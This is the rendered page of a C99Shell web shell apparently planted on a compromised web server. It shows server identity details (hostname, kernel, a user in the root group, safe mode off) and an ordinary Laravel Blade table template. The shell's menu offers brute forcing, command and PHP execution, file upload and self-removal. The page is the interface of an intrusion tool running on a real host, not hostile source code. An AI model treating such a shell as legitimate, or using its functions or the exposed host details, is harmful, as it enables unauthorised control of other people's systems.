!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/Modules/CustomField/Resources/views/value/   drwxr-xr-x
Free 28.28 GB of 117.98 GB (23.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (1.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table class="table table-hover text-nowrap table-bordered m-0">
    <thead>
        <tr class="text-center">
            <th>{{ __('name') }}</th>
            <th width="10%">{{ __('action') }}</th>
        </tr>
    </thead>
    <tbody>
        @forelse ($values as $item)
            <tr data-id="{{ $item->id }}">
                <td class="text-center">
                    <a href="{{ route('module.custom.field.edit.value', $item->id) }}">
                        {{ ucfirst($item->value) }}
                    </a>
                </td>
                <td class="text-center">
                    @if (userCan('custom-field.update'))
                        <a data-toggle="tooltip" title="{{ __('edit') }}"
                            href="{{ route('module.custom.field.edit.value', $item->id) }}" class="">
                            <div class="handle btn btn-success mt-0">
                                <i class="fas fa-edit"></i>
                            </div>
                        </a>
                    @endif
                    @if (userCan('custom-field.delete'))
                        <form action="{{ route('module.custom.field.destroy.value', $item->id) }}" method="POST"
                            class="d-inline">
                            @method('DELETE')
                            @csrf
                            <button data-toggle="tooltip" data-placement="top" title="{{ __('delete') }}"
                                onclick="return confirm('{{ __('are_you_sure_want_to_delete_this_item') }}');"
                                class="btn bg-danger mr-1"><i class="fas fa-trash"></i>
                            </button>
                        </form>
                    @endif
                </td>
            </tr>
        @empty
            <tr>
                <td colspan="10" class="text-center">
                    <x-not-found word="field" route="" />
                </td>
            </tr>
        @endforelse
    </tbody>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--